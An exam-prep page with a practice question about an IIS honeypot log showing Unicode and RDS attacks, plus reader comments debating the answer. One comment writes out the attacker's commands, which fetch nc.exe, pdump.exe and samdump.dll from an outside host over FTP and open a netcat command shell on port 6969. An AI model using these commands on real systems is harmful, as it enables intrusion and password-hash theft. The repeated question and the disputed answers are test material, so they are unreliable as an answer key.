What can you infer from the exploit given?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious
user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS
server. He does a quick query to discover that the directory exists, and a query to msadcs.dll
shows that it is functioning correctly. The attacker makes a RDS query which results in the
commands run as shown below:

What can you infer from the exploit given?

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious
user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS
server. He does a quick query to discover that the directory exists, and a query to msadcs.dll
shows that it is functioning correctly. The attacker makes a RDS query which results in the
commands run as shown below:

What can you infer from the exploit given?

A.
It is a local exploit where the attacker logs in using username johna2k.

B.
There are two attackers on the system – johna2k and haxedj00.

C.
The attack is a remote exploit and the hacker downloads three files.

D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.



Leave a Reply 5

Your email address will not be published. Required fields are marked *


miguel

miguel

C.
The attack is a remote exploit and the hacker downloads TWO files.

HuHai

HuHai

D.
The last line ‘cmd1.exe /c ne -l -p 6969 -e cmd1.exe’ that is using TCP, not UDP.
Look at ‘cmd1.exe /c echo get samdump.dll >>fptcom’ that hacker run on remote victim.
Hacker transfer file ‘samdump.dll’ to victim that is upload.

Bill

Bill

This question is missing a line. This is what it is supposed to look like so it does show 3 files. The one on this page only has 2. The answer on the exam will be C and it will have 3 files.

“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get pdump.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 -e cmd1.exe”

What can you infer from the exploit given?

A.
It is a local exploit where the attacker logs in using username johna2k

B.
There are two attackers on the system – johna2k and haxedj00

C.
The attack is a remote exploit and the hacker downloads three files

D.
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Mike

Mike

thanks bill. thought this question might actually be wrong.